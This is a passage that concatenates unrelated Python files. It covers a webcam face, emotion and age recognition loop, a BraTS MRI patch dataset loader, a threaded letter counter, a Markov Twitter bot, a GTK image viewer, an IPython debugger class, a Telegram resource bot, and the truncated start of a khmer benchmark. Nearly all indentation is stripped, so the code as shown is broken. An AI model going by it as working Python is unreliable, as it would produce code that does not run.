# cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
# cv2.rectangle(frame, (right, top), (right + 150, top + 100), (0, 125, 125), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, 'Name: ' + name, (right + 5, top + 20), font, 0.5, (255, 255, 255), 1)
cv2.putText(frame, 'Emotion: ' + emotion, (right + 5, top + 40), font, 0.5, (255, 255, 255), 1)
cv2.putText(frame, 'Gender: ' + gender, (right + 5, top + 60), font, 0.5, (255, 255, 255), 1)
cv2.putText(frame, 'Age: ' + str(age), (right + 5, top + 80), font, 0.5, (255, 255, 255), 1)
for loc in face_locations_keypoint:
shape = landmark_predictor(cv2.cvtColor(frame_copy, cv2.COLOR_BGR2GRAY), loc)
shape = face_utils.shape_to_np(shape)
for (x, y) in shape:
cv2.circle(frame, (x, y), 2, (0, 125, 125), -1)
# Display the resulting image
cv2.imshow('Video', frame)
frame_count += 1
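        # swap current/next request ids so each network keeps ping-ponging between its two async infer requests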
cur_request_id, next_request_id = next_request_id, cur_request_id
cur_request_id_a, next_request_id_a = next_request_id_a, cur_request_id_a
cur_request_id_f, next_request_id_f = next_request_id_f, cur_request_id_f
# send to socket
encoded, buffer = cv2.imencode('.jpg', frame)
jpg_as_text = base64.b64encode(buffer)
footage_socket.send(jpg_as_text)
emotion_socket.send_json(jsonpickle.encode(emotion_payload))
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
q.put({'eof': True})
# Release handle to the webcam
fvs.stop()
cv2.destroyAllWindows()
del exec_net
del plugin
if __name__ == '__main__':
jobs = []
buff_dict = dict()
    number_of_processes = 2
    for i in range(number_of_processes):
t = Process(target=process_task)
jobs.append(t)
t.start()
main()
|
data.py
|
import sys
if sys.version_info[0] == 2:
import Queue as queue
else:
import queue
import os
import math
import multiprocessing as mp
import threading
import torch
from torch.utils.data import Dataset
import numpy as np
from utils import get_receptive_field, get_sub_patch_shape, \
get_offset, sample_coords, get_all_coords, nib_load
PATCH_SHAPE = (25, 25, 25)
KERNELS = ((3, 3, 3), )*8
SCALE_FACTOR = (3, 3, 3)
SHAPE = [240, 240, 155]
np.random.seed(2017)
class ImageList(Dataset):
def __init__(self,
list_file,
patch_shape=PATCH_SHAPE,
kernels=KERNELS,
scale_factor=SCALE_FACTOR,
root='',
split='valid',
sample_size=20):
with open(list_file) as f:
names = f.read().splitlines()
names = [os.path.join(root, name) for name in names]
self.root = root
self.names = names
self.split = split
self.sample_size = sample_size
self.receptive_field = get_receptive_field(kernels)
self.patch_shape = np.array(patch_shape)
self.scale_factor = np.array(scale_factor)
self.sub_patch_shape = get_sub_patch_shape(self.patch_shape,
self.receptive_field, self.scale_factor)
self.sub_off = get_offset(self.scale_factor, self.receptive_field)
self.modalities = ('Flair', 'T1c', 'T1', 'T2')
self.C = len(self.modalities)
def coord_to_slice(self, coord):
return coord[:, 0], coord[:, 1] + 1
def coord_to_sub_slice(self, coord):
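        # the sub-patch is a wider context window sampled every scale_factor voxels around the patch;
        # lo/hi are clipped to the volume and the overshoot is returned as padding amounts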
lo = coord[:, 0] + self.sub_off
num = self.patch_shape - self.receptive_field + 1
hi = lo + self.scale_factor*self.receptive_field + \
np.ceil((num*1.0)/self.scale_factor - 1) * self.scale_factor
hi = hi.astype('int')
m = lo < 0
pl = -lo * m
lo[lo < 0] = 0
m = hi > SHAPE
ph = (hi - SHAPE) * m
hi += pl
        pad = list(zip(pl, ph))
return lo, hi, pad
def crop(self, coords, label, path):
N = coords.shape[0]
samples = np.zeros((N, self.C) + tuple(self.patch_shape), dtype='float32')
sub_samples = np.zeros((N, self.C) + tuple(self.sub_patch_shape), dtype='float32')
labels = np.zeros((N,) + (9, 9, 9), dtype='int')
        size = (self.sub_patch_shape - 1)//2
        gl = (self.patch_shape - size)//2
gh = self.patch_shape - gl
kx, ky, kz = self.scale_factor
images = np.array([
nib_load(os.path.join(path, modal + '_subtrMeanDivStd.nii.gz')) \
for modal in self.modalities])
for n, coord in enumerate(coords):
ss, ee = self.coord_to_slice(coord)
lo, hi, pad = self.coord_to_sub_slice(coord)
cropped_label = label[ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
labels[n] = cropped_label[gl[0]:gh[0], gl[1]:gh[1], gl[2]:gh[2]]
samples[n] = images[:, ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
pimages = np.pad(images, [(0, 0)] + pad, mode='constant') \
if np.sum(pad) > 0 else images
sub_samples[n] = \
pimages[:, lo[0]:hi[0]:kx, lo[1]:hi[1]:ky, lo[2]:hi[2]:kz]
return samples, sub_samples, labels
def __call__(self, index):
return self.__getitem__(index)
def __getitem__(self, index):
path = self.names[index]
mask_file = os.path.join(path, 'brainmask.nii.gz')
mask = nib_load(mask_file)
label_file = os.path.join(path, 'OTMultiClass.nii.gz')
label = nib_load(label_file)
n = self.sample_size
if self.split == 'train':
fg = (label > 0).astype('int32')
bg = ((mask > 0) * (fg == 0)).astype('int32')
coords = np.concatenate(
                [sample_coords(n//2, self.patch_shape, weight) for weight in (fg, bg)])
elif self.split == 'valid':
coords = sample_coords(n, self.patch_shape, mask)
else: # test
coords = get_all_coords((9, 9, 9), self.patch_shape, SHAPE, 15)
samples, sub_samples, labels = self.crop(coords, label, path)
return samples, sub_samples, labels, coords
def __len__(self):
return len(self.names)
class Tuple(Dataset):
def __init__(self, data):
self.data = data
def __getitem__(self, index):
return [d[index] for d in self.data]
def __len__(self):
return len(self.data[0])
def default_collate_fn(batch):
return [torch.cat([torch.from_numpy(t) for t in v]) for v in zip(*batch)]
class PEDataLoader(object):
"""
    A multiprocess data loader that parallelizes over elements, as opposed to
    over batches (which is what the torch built-in DataLoader does).
Input dataset must be callable with index argument: dataset(index)
https://github.com/thuyen/nnet/blob/master/pedataloader.py
"""
def __init__(self, dataset, batch_size=1, shuffle=False,
num_workers=None, pin_memory=False, num_batches=None):
self.dataset = dataset
self.batch_size = batch_size
self.shuffle = shuffle
self.num_workers = num_workers
self.collate_fn = default_collate_fn
self.pin_memory_fn = \
torch.utils.data.dataloader.pin_memory_batch if pin_memory else \
lambda x: x
self.num_samples = len(dataset)
self.num_batches = num_batches or \
int(math.ceil(self.num_samples / float(self.batch_size)))
self.pool = mp.Pool(num_workers)
self.buffer = queue.Queue(maxsize=1)
self.start()
def generate_batches(self):
if self.shuffle:
indices = torch.LongTensor(self.batch_size)
for b in range(self.num_batches):
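                # note: Tensor.random_(from, to) samples from [from, to), so batch indices are drawn with replacement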
indices.random_(0, self.num_samples-1)
batch = self.pool.map(self.dataset, indices)
batch = self.collate_fn(batch)
batch = self.pin_memory_fn(batch)
yield batch
else:
self.indices = torch.LongTensor(range(self.num_samples))
for b in range(self.num_batches):
start_index = b*self.batch_size
end_index = (b+1)*self.batch_size if b < self.num_batches - 1 \
else self.num_samples
indices = self.indices[start_index:end_index]
batch = self.pool.map(self.dataset, indices)
batch = self.collate_fn(batch)
batch = self.pin_memory_fn(batch)
yield batch
def start(self):
def _thread():
for b in self.generate_batches():
self.buffer.put(b, block=True)
self.buffer.put(None)
thread = threading.Thread(target=_thread)
thread.daemon = True
thread.start()
def __next__(self):
batch = self.buffer.get()
if batch is None:
self.start()
raise StopIteration
return batch
next = __next__
def __iter__(self):
return self
def __len__(self):
return self.num_batches
|
letter_counter.py
|
import json
import urllib.request
import time
from threading import Thread, Lock
finished_count = 0
def count_letters(url, frequency, mutex):
response = urllib.request.urlopen(url)
txt = str(response.read())
mutex.acquire()
for l in txt:
letter = l.lower()
if letter in frequency:
frequency[letter] += 1
global finished_count
finished_count += 1
mutex.release()
def main():
frequency = {}
mutex = Lock()
for c in "abcdefghijklmnopqrstuvwxyz":
frequency[c] = 0
start = time.time()
for i in range(1000, 1020):
Thread(target=count_letters, args=(f"https://www.rfc-editor.org/rfc/rfc{i}.txt", frequency, mutex)).start()
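    # poll finished_count (guarded by the mutex) until all 20 downloader threads have reported completion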
while True:
mutex.acquire()
if finished_count == 20:
break
mutex.release()
time.sleep(0.5)
end = time.time()
print(json.dumps(frequency, indent=4))
print("Done, time taken", end - start)
main()
|
markovtweets.py
|
from time import sleep
from datetime import datetime
import calendar
import threading
import random
import logging
import os
from . import markov_chain
from . import string_control
class MarkovTweets:
def __init__(self, api, settings):
self.api = api
self.settings = settings
self.chain = markov_chain.build_chain(markov_chain.read_file(settings["markov_chain_source"]))
def automatic_sentence(self):
while True:
if self.settings["random_hashtag"]:
if random.random() <= self.settings["random_hashtag_percentage"]:
hashtag = random.choice(self.api.trending_type("116545", "Hashtag"))
else:
hashtag = ""
random_message = markov_chain.create_message(self.chain, max_length=self.settings["tweet_max_words"])
random_message = string_control.clean_blank_space(random_message)
random_message = string_control.limit_check(random_message, self.settings["twitter_char_limit"], hashtag)
self.api.update_status(random_message)
sleep(self.settings["random_message_timer"])
@staticmethod
def __twitter_string_to_date(date_string):
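        # Twitter's created_at looks like e.g. 'Wed Oct 10 20:19:24 +0000 2018'; rebuild it as 'month day time year' for strptime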
date_list = date_string.split()
return datetime.strptime(f"{list(calendar.month_abbr).index(date_list[1])} {date_list[2]} {date_list[3]} {date_list[5]}", '%m %d %H:%M:%S %y')
def start(self):
if self.settings["random_message"]:
threading.Thread(target=self.automatic_sentence).start()
if os.path.exists("last_tweet_date.txt"):
with open('last_tweet_date.txt', 'r+') as file:
old_tweet_date = self.__twitter_string_to_date(file.read().replace('\n', ''))
else:
open('last_tweet_date.txt', 'w').close()
old_tweet_date = datetime.now()
while True:
r = self.api.get_mentions()
if r.status_code == 429:
logging.warning("API limit reached." + datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
else:
for response in r.json():
if old_tweet_date < self.__twitter_string_to_date(response["created_at"]):
input_starting_sentence = response["text"].replace(self.settings["bot_username"], "")
message = markov_chain.create_message(self.chain, max_length=self.settings["tweet_max_words"], starting_sentence=input_starting_sentence)
final_message = string_control.clean_blank_space(message)
final_message = string_control.limit_check(final_message, self.settings["twitter_char_limit"], " @" + response["user"]["screen_name"])
self.api.update_status(final_message, in_reply_to_status_id=response["id"])
else:
break
old_tweet_date = self.__twitter_string_to_date(r.json()[0]["created_at"])
with open('last_tweet_date.txt', 'w') as file:
file.write(r.json()[0]["created_at"])
sleep(15)
|
DynamicMedia.py
|
#!/usr/bin/python3
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, GObject, GdkPixbuf, Gdk
import tempfile
import cgi,posixpath
import time
import urllib.request,urllib.parse
import os
from shutil import copyfile
from threading import Thread
try:
import math
inf=math.inf
except:
inf=float("inf")
scale_method=GdkPixbuf.InterpType.BILINEAR
(TARGET_ENTRY_TEXT, TARGET_ENTRY_PIXBUF) = range(2)
(COLUMN_TEXT, COLUMN_PIXBUF) = range(2)
DRAG_ACTION = Gdk.DragAction.COPY
tempdirobj=tempfile.TemporaryDirectory(prefix="booru-browse-")
tempdir=tempdirobj.name
print("using tempdir:",tempdir)
def getName(url,content):
domain=urllib.parse.urlsplit(url).netloc
disposition=content.getheader('content-disposition')
if disposition:
_,params=cgi.parse_header(disposition)
return domain,params['filename']
else:
return domain,posixpath.basename(urllib.parse.urlsplit(url).path)
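# simple in-memory cache: url -> path of the file already written to the temp dir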
imgcache={}
def loadWithProgress(url, progress):
request=urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
content=urllib.request.urlopen(request)
buff=bytes()
length=content.getheader('content-length')
domain,name=getName(url,content)
#print(domain,name)
    if length:
        length=int(length)
        blocksize=max(4096, length//100)
    else:
        #no content-length header: fall back to a fixed block size and skip the percentage updates
        blocksize=4096
    def progUpdate():
        if not length:
            return False
        have=len(buff)
        if have<length:
            progress.set_fraction(have/length)
            return True
        return False
GObject.idle_add(progUpdate)
timer=time.time()
while True:
read=content.read(blocksize)
if read:
buff+=read
else:
break
timer=time.time()-timer
print("{}\n\ttook {:.2f} seconds, speed was {:.2f} KB/s".format(url, timer, len(buff)/(timer*1024)))
#cache the image
path=os.path.join(tempdir, domain)
if not os.path.exists(path):
os.mkdir(path)
path="{}/{}".format(path,name)
return path, name,buff
class DynamicMedia(Gtk.EventBox):
def __init__(self, path=None, url=None):
super(DynamicMedia, self).__init__()
#some properties
self.media=Gtk.Image()
self.name=""
self.buf=None
self.path=None
self.fit=True
self.allowUpscale=True
self.draggable=False
self.lastPath=os.path.expanduser('~/Downloads')
def toggle(w, e):
self.fit=not self.fit
self.connect("button_release_event", toggle)
#actually send the data
def data_get(widget,context,selection,info,evttime):
print("drag dropped")
#print(type(selection))
#print(widget,context,selection,info,evttime)
selection.set_uris(["file://"+self.path])
self.connect('drag_data_get',data_get)
#assemble everything
overlay=Gtk.Overlay()
overlay.add(self.media)
self.progressbox=Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
overlay.add_overlay(self.progressbox)
self.add(overlay)
GObject.idle_add(self.resizeSelf)
self.load(path, url)
def enableDrag(self):
if os.name=='nt':
print("Drag n Drop not supported on windows")
return
targets=[
#Gtk.TargetEntry.new('image/x-xpixmap',0,TARGET_ENTRY_PIXBUF),
Gtk.TargetEntry.new('text/uri-list',0,TARGET_ENTRY_PIXBUF),
#Gtk.TargetEntry.new('text/plain',0,TARGET_ENTRY_TEXT),
]
self.drag_source_set(Gdk.ModifierType.BUTTON1_MASK,targets,DRAG_ACTION)
self.draggable=True
def disableDrag(self):
self.drag_source_unset()
self.draggable=False
def generateDrag(self):
if self.draggable and self.buf:
pbuf=self.buf.get_static_image()
(x,y)=(pbuf.get_width(),pbuf.get_height())
scale=128/max(x,y)
self.drag_source_set_icon_pixbuf(pbuf.scale_simple(scale*x,scale*y,scale_method))
def load(self, path=None, url=None):
if path:
self.name=os.path.basename(path)
with open(path,'rb') as f:
#TODO: make copy in temp dir?
self.path=path
loader=GdkPixbuf.PixbufLoader()
loader.write(f.read())
loader.close()
#self.buf=GdkPixbuf.PixbufAnimation.new_from_file(path)
self.buf=loader.get_animation()
self.iter=self.buf.get_iter()
self.media.set_from_animation(self.buf)
self.enableDrag()
self.generateDrag()
elif url:
#if cached, use cached image
if url in imgcache:
self.load(path=imgcache[url])
return
loadbar=Gtk.ProgressBar()
#if this is unset, then the displayed text will be the load percent
#that said,
#loadbar.set_text(url)
loadbar.show()
self.progressbox.add(loadbar)
def asyncload():
loader=GdkPixbuf.PixbufLoader()
                #these need to be stored separately from the self.* versions to prevent race conditions in the cache
path, name,buff=loadWithProgress(url, loadbar)
(self.path,self.name)=(path, name)
loader.write(buff)
loader.close()
#self.name=source.info().get_filename()
#print("got filename: ", self.name)
self.buf=loader.get_animation()
self.iter=self.buf.get_iter()
def finish():
self.media.set_from_animation(self.buf)
self.progressbox.remove(loadbar)
self.enableDrag()
self.generateDrag()
return False
GObject.idle_add(finish)
#flush to disk in background
with open(path,'wb+') as f:
f.write(buff)
imgcache[url]=path
t=Thread(target=asyncload, daemon=True)
t.start()
else:
#TODO: in the future, should empty current content
self.disableDrag()
return
def resizeSelf(self):
if not self.buf:
return True
container=self.get_parent().get_allocation()
(x, y)=(container.width, container.height)
(realx, realy)=(self.buf.get_width(), self.buf.get_height())
scale=min(x/realx, y/realy, inf if self.allowUpscale else 1) if self.fit else 1
(x, y)=(scale*realx, scale*realy)
if self.buf.is_static_image():
self.media.set_from_pixbuf(
self.buf.get_static_image().scale_simple(x,y,scale_method)
)
elif hasattr(self, 'iter') and self.iter.advance():
self.media.set_from_pixbuf(
self.iter.get_pixbuf().scale_simple(x,y,scale_method)
)
#TODO: the best approach here might just be doing the animation stepping myself, for both static and not
#self.media.set_from_animation(pixbuf_anim_copy_resize(self.buf, x, y))
return True
def saveDialog(self, rootwin=None):
#TODO: wait (in bg thread) to ensure disk file is fully written before opening save dialog
if not self.path:
print("no image loaded, cant save")
return
print("saving media!")
dialog=Gtk.FileChooserDialog(
"Save image", rootwin,
Gtk.FileChooserAction.SAVE,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_SAVE, Gtk.ResponseType.OK)
)
print("default name should be:", self.name)
dialog.set_current_folder(self.lastPath)
dialog.set_current_name(self.name)
dialog.set_do_overwrite_confirmation(True)
response=dialog.run()
if response==Gtk.ResponseType.OK:
saveto=dialog.get_filename()
self.lastPath=os.path.dirname(saveto)
print("saving to:", saveto)
copyfile(self.path, saveto)
elif response==Gtk.ResponseType.CANCEL:
print("save canceled")
dialog.destroy()
if __name__=="__main__":
win=Gtk.Window()
win.connect("delete-event", lambda wid, event:Gtk.main_quit())
win.set_size_request(320, 240)
win.set_title("Title")
#img=DynamicMedia('8db.jpg')
#img=DynamicMedia('54a.gif')
#img=DynamicMedia('Red-Big-Frog-Wallpaper-Photos-202.jpg')
img=DynamicMedia(url='http://i0.kym-cdn.com/photos/images/newsfeed/001/256/886/074.gif')
sw=Gtk.ScrolledWindow()
sw.add(img)
win.add(sw)
win.show_all()
GObject.threads_init()
Gtk.main()
|
debugger.py
|
import asyncio
import signal
import sys
import threading
from IPython.core.debugger import Pdb
from IPython.core.completer import IPCompleter
from .ptutils import IPythonPTCompleter
from .shortcuts import create_ipython_shortcuts, suspend_to_bg, cursor_in_leading_ws
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.filters import (Condition, has_focus, has_selection,
vi_insert_mode, emacs_insert_mode)
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.key_binding.bindings.completion import display_completions_like_readline
from pygments.token import Token
from prompt_toolkit.shortcuts.prompt import PromptSession
from prompt_toolkit.enums import EditingMode
from prompt_toolkit.formatted_text import PygmentsTokens
from prompt_toolkit import __version__ as ptk_version
PTK3 = ptk_version.startswith('3.')
class TerminalPdb(Pdb):
"""Standalone IPython debugger."""
def __init__(self, *args, **kwargs):
Pdb.__init__(self, *args, **kwargs)
self._ptcomp = None
self.pt_init()
def pt_init(self):
def get_prompt_tokens():
return [(Token.Prompt, self.prompt)]
if self._ptcomp is None:
compl = IPCompleter(shell=self.shell,
namespace={},
global_namespace={},
parent=self.shell,
)
self._ptcomp = IPythonPTCompleter(compl)
options = dict(
message=(lambda: PygmentsTokens(get_prompt_tokens())),
editing_mode=getattr(EditingMode, self.shell.editing_mode.upper()),
key_bindings=create_ipython_shortcuts(self.shell),
history=self.shell.debugger_history,
completer=self._ptcomp,
enable_history_search=True,
mouse_support=self.shell.mouse_support,
complete_style=self.shell.pt_complete_style,
style=self.shell.style,
color_depth=self.shell.color_depth,
)
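        # on prompt_toolkit < 3 the shell's inputhook has to be passed to PromptSession explicitly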
if not PTK3:
options['inputhook'] = self.shell.inputhook
self.pt_loop = asyncio.new_event_loop()
self.pt_app = PromptSession(**options)
def cmdloop(self, intro=None):
"""Repeatedly issue a prompt, accept input, parse an initial prefix
off the received input, and dispatch to action methods, passing them
the remainder of the line as argument.
override the same methods from cmd.Cmd to provide prompt toolkit replacement.
"""
if not self.use_rawinput:
raise ValueError('Sorry ipdb does not support use_rawinput=False')
# In order to make sure that prompt, which uses asyncio doesn't
# interfere with applications in which it's used, we always run the
# prompt itself in a different thread (we can't start an event loop
# within an event loop). This new thread won't have any event loop
# running, and here we run our prompt-loop.
self.preloop()
try:
if intro is not None:
self.intro = intro
if self.intro:
self.stdout.write(str(self.intro)+"\n")
stop = None
while not stop:
if self.cmdqueue:
line = self.cmdqueue.pop(0)
else:
self._ptcomp.ipy_completer.namespace = self.curframe_locals
self._ptcomp.ipy_completer.global_namespace = self.curframe.f_globals
# Run the prompt in a different thread.
line = ''
keyboard_interrupt = False
def in_thread():
nonlocal line, keyboard_interrupt
try:
line = self.pt_app.prompt()
except EOFError:
line = 'EOF'
except KeyboardInterrupt:
keyboard_interrupt = True
th = threading.Thread(target=in_thread)
th.start()
th.join()
if keyboard_interrupt:
raise KeyboardInterrupt
line = self.precmd(line)
stop = self.onecmd(line)
stop = self.postcmd(stop, line)
self.postloop()
except Exception:
raise
def set_trace(frame=None):
"""
Start debugging from `frame`.
If frame is not specified, debugging starts from caller's frame.
"""
TerminalPdb().set_trace(frame or sys._getframe().f_back)
if __name__ == '__main__':
import pdb
# IPython.core.debugger.Pdb.trace_dispatch shall not catch
# bdb.BdbQuit. When started through __main__ and an exception
# happened after hitting "c", this is needed in order to
# be able to quit the debugging session (see #9950).
old_trace_dispatch = pdb.Pdb.trace_dispatch
pdb.Pdb = TerminalPdb
pdb.Pdb.trace_dispatch = old_trace_dispatch
pdb.main()
|
bot.py
|
"""
[emoji symbols]
orange box : 🔸
man with laptop : 👨💻
"""
import os
import telebot
from telebot import types
import random
import json
import threading, schedule, time  # extras
from utils.github_tools import *
TOKEN = open('test-key.txt').readline().strip()
# TOKEN = os.getenv('TG_TOKEN')
cpp_data = json.load(open('utils/resource/cpp_resource.json'))
bot = telebot.TeleBot(TOKEN,parse_mode='HTML')
print("Bot is online")
hey_msg = ['Hi ','Hello ','Hey ']
bot_name = ['Developer','Coder','Mastermind','Cool','Resource']
user_name = ['Developer','Coder','Genius','Mastermind','Buddy','Programmer']
knownUsers = []
userStep = {}
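# knownUsers tracks chats we have seen; userStep maps chat id -> conversation state ('cpp', 'github', 'github_search', ...)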
#----------------Keyboard Layouts--------------------
#command_cpp keyboard [value=cpp]
cpp_select = types.ReplyKeyboardMarkup(one_time_keyboard=True)
cpp_select.add('Youtube videos','PDFs','Courses','Websites(Learning)','Websites(Practice)')
#command_github keyboard [value=github]
github_select = types.ReplyKeyboardMarkup(one_time_keyboard=True)
github_select.add('Search','Search(by user)')
github_select.add('Clone Repository')
hideBoard = types.ReplyKeyboardRemove() # hide the keyboard
commands = {
'start':'Restart bot',
'cpp' : 'C++ resources',
'github' : 'Search and clone Repository',
'codeforces' : 'still in development...',
'stackoverflow' : 'still in development...',
'help': 'Help',
'all' : 'List all commands',
}
#--------------------others functions----------------------
#get resource data
def cpp_resource(NAME):
for cpp in cpp_data:
if cpp['name'] == NAME:
text = ''
for i in cpp:
if i!='name':
text += '🔸 '
text += i
text += "\n"
text += cpp[i]
text += "\n\n"
return text
def get_user_step(uid):
if uid in userStep:
return userStep[uid]
else:
knownUsers.append(uid)
userStep[uid] = 0
print("New user detected")
return 0
#console output
def listener(messages):
for m in messages:
if m.content_type == 'text':
print(m.from_user.first_name +'['+ str(m.chat.id) + "] : " + m.text)
bot.set_update_listener(listener)
#------------------------All main commands--------------------------
@bot.message_handler(commands=['all'])
def command_all(m):
text = " All available commands 👨💻 : \n\n"
for key in commands:
text += "🔸 /" + key + " : "
text += commands[key] + "\n\n"
bot.send_message(m.chat.id, text)
@bot.message_handler(commands=['cpp'])
def command_cpp(m):
cid = m.chat.id
bot.send_message(cid, "What do you want ?", reply_markup=cpp_select)
userStep[cid] = 'cpp'
@bot.message_handler(commands=['github'])
def command_github(m):
cid = m.chat.id
bot.send_message(cid, "What do you want ?", reply_markup=github_select)
userStep[cid] = 'github'
@bot.message_handler(commands=['codeforces'])
def command_codeforces(m):
text = "Still in development..."
bot.reply_to(m, text)
@bot.message_handler(commands=['stackoverflow'])
def command_stackoverflow(m):
text = "Comming soon....."
bot.reply_to(m, text)
@bot.message_handler(commands=['help'])
def command_help(m):
bot.send_chat_action(m.chat.id, 'typing')
text = random.choice(hey_msg)
if m.chat.type == "private":
text += m.chat.first_name
else:
text += random.choice(user_name)
text += ' , I am a '+ random.choice(bot_name) + " Bot"
text += '\n\nI can do following things :'
text += '\n 🔸 Provide C++ Resources'
text += '\n 🔸 Github search , Clone Repository'
    text += '\n 🔸 Codeforces Visualizer, Random Problems (coming soon)'
    text += '\n 🔸 Stackoverflow Search (coming soon)'
text += "\n\nSee all commands at /all :)"
text += "\n\n\nContact Developer 👨💻: @vishal2376"
bot.reply_to(m, text)
@bot.message_handler(commands=['start'])
def command_start(m):
cid = m.chat.id
if cid not in knownUsers:
knownUsers.append(cid)
userStep[cid] = 0
command_help(m)
#-------------------Custom keyboard functions-------------------
#---------------------------cpp-----------------------------
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'cpp')
def msg_cpp_select(m):
cid = m.chat.id
# userStep[cid] = 0
bot.send_chat_action(cid, 'typing')
if m.text == 'Youtube videos':
text = cpp_resource('yt')
bot.send_message(cid,text,disable_web_page_preview=True,reply_markup=hideBoard)
elif m.text =='PDFs':
text = cpp_resource('pdf')
bot.send_message(cid,text,disable_web_page_preview=True,reply_markup=hideBoard)
elif m.text =='Websites(Practice)':
text = cpp_resource('practice_websites')
bot.send_message(cid,text,disable_web_page_preview=True,reply_markup=hideBoard)
elif m.text =='Websites(Learning)':
text = cpp_resource('learning_websites')
bot.send_message(cid,text,disable_web_page_preview=True,reply_markup=hideBoard)
elif m.text =='Courses':
text = cpp_resource('courses')
bot.send_message(cid,text,disable_web_page_preview=True)
else:
bot.send_message(cid, "Invalid Commands")
#-------------------github all functions-------------------------
#[value=github]
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'github')
def msg_github_select(m):
cid = m.chat.id
userStep[cid] = 0
bot.send_chat_action(cid, 'typing')
if m.text == 'Search':
# text = 'Not available for some days'
text = 'Enter your query '
bot.send_message(m.chat.id,text,reply_markup=hideBoard)
userStep[cid] = 'github_search'
elif m.text == 'Search(by user)':
text = 'Enter username \nExample : vishal2376'
bot.send_message(m.chat.id,text,reply_markup=hideBoard)
userStep[cid] = 'github_search_user'
elif m.text == 'Clone Repository':
text = 'Enter username \nExample : vishal2376'
bot.send_message(m.chat.id,text,reply_markup=hideBoard)
userStep[cid] = 'github_clone_view'
else:
bot.send_message(cid, "Invalid Commands")
#[value=github_clone]
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'github_clone')
def msg_github_clone(m):
cid = m.chat.id
userStep[cid] = 0
user_name = ''
with open('github/user_name.txt','r') as f:
user_name = f.readline()
repo_list = get_repo_list(user_name)
try:
for repo_name in repo_list:
if m.text == '/stop':
bot.send_message(cid,"Successfully stopped",reply_markup=hideBoard)
break
elif m.text == repo_name:
full_repo = user_name +'/'+repo_name
bot.send_chat_action(cid, 'typing')
text = 'https://github.com/'+full_repo+'/archive/refs/heads/master.zip'
msg = bot.send_message(cid,text,reply_markup=hideBoard)
except Exception as e:
bot.send_message(cid,'Something went Wrong',reply_markup=hideBoard)
print('Error : Failed to download or send files')
#[value=github_clone_view]
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'github_clone_view')
def view_clone_repo(m):
try:
repo_list = get_repo_list(m.text)
button = types.ReplyKeyboardMarkup(one_time_keyboard=True)
for repo_name in repo_list:
button.add(repo_name)
bot.send_message(m.chat.id,'Click button to clone Repository \n\nUse /stop to exit',reply_markup=button)
userStep[m.chat.id] = 'github_clone'
except Exception as e:
bot.send_message(m.chat.id,'Something went wrong , Try again later',reply_markup=hideBoard)
print("Error : Keyboard not created")
#[value=github_search_user]
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'github_search_user')
def view_user_repo(m):
try:
userStep[m.chat.id]=0
repo_list = get_repo_list(m.text,1)
text = 'Github Repository List\n\n'
for repo_name in repo_list:
name = repo_name.split('/')[1]
stars = get_repo_stars(repo_name)
issues = get_repo_issues(repo_name)
text += '🔸 <b>'+ name + '</b>\n'
text += 'Stars : '+str(stars)+' | Issues : '+ str(issues)
text += '\n<a href = "https://github.com/'+ repo_name + '">Click here to visit</a>\n\n'
bot.send_message(m.chat.id,text,disable_web_page_preview=True)
except Exception as e:
bot.send_message(m.chat.id,'Github API search Limit exceed',reply_markup=hideBoard)
print("Error : Github search Limit exceed")
#[value=github_search]
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'github_search')
def view_repo(m):
try:
userStep[m.chat.id]=0
repo_list = search_repo(m.text)
text = 'Top Search Results \n\n'
for repo_name in repo_list:
#name = repo_name.split('/')[1]
stars = get_repo_stars(repo_name)
issues = get_repo_issues(repo_name)
text += '🔸 '+ repo_name + '\n'
text += 'Stars : '+str(stars)+' | Issues : '+ str(issues)
text += '\n<a href = "https://github.com/'+ repo_name + '">Click here to visit</a>\n\n'
bot.send_message(m.chat.id,text,disable_web_page_preview=True)
except Exception as e:
bot.send_message(m.chat.id,'Github API search Limit exceed',reply_markup=hideBoard)
print("Error : Search limit exceed")
#-------------------------------------------------
#-----------------EXTRA-------------------------
run = True
rem_time = '20:15'
def remainder():
msg = "⏰ [Remainder]\n\n"
msg += "👨💻 Codeforces Contest will start in 15min.\n"
msg += "\nLink : "
msg += rem_link
bot.send_message(grp_id,msg,disable_web_page_preview=True)
global run
run = False
return schedule.CancelJob
#-------------------------------------------------
#-------------------------------------------------
# filter message
@bot.message_handler(func=lambda message: True, content_types=['text'])
def command_default(m):
lower_text = m.text.lower()
if lower_text == 'hello' or lower_text == 'hi':
text = random.choice(hey_msg)
text += m.from_user.first_name
bot.reply_to(m, text)
if 'https://codeforces.com/contestInvitation' in m.text:
global grp_id
global rem_link
grp_id = m.chat.id
rem_link = m.text
schedule.every().day.at(rem_time).do(remainder)
text = "⏰ Codeforces remainder scheduled\n"
bot.send_message(m.chat.id,text)
def forever():
while run:
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=forever,name='remainder')
t1.start()
bot.polling()
|
bench-graphsize-th.py
|
#! /usr/bin/env python2
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2013. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
import khmer
import sys
import screed
import threading
import Queue
K = 14
HASHTABLE_SIZE = int(1e9)
THRESHOLD = 100
GROUPSIZE = 100
WORKER_THREADS = 4
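# pipeline: the main thread batches FASTA records into inqueue, WORKER_THREADS threads keep records whose
# k-mer graph component size reaches THRESHOLD, and a single writer thread drains outqueue to the output file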
def process(inq, outq, ht):
global worker_count
while not done or not inq.empty():
try:
